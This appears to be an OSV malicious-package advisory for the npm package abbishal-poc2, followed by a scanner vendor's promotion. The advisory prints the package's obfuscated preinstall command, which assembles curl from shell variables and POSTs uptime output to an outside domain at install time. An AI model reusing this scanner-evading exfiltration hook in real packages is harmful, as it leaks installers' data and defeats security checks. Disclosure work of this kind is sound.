abbishal-poc2@1.2.0
Vulnerability report · Last retrieved from osv.dev October 8, 2026 at 10:42 AM UTC
OSV ID
MAL-2026-17654
Ecosystem
npm
Summary
package.json declares a preinstall script sh./test.sh. test.sh assembles the string curl from single-character shell variables (b=e, i=c, s=n, h=u, a=v, l=rl) and then invokes $i$h$l -d "uptime" https://abbishal.com/sh/poc, POSTing the output of uptime (and implicitly the installer's source IP) to abbishal.com at npm install time. The README claims the package has no install scripts and no network activity, directly contradicting the shipped behavior. The command-name obfuscation via per-letter variable assembly is a technique to evade static scanners searching for curl in lifecycle scripts, and the destination domain does not match the package's claimed publisher.
Source: amazon-inspector (e1a4950e43d1db42d899107c229ccdbb21fd5e8eeeb4d5771b352a8918658e4f)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.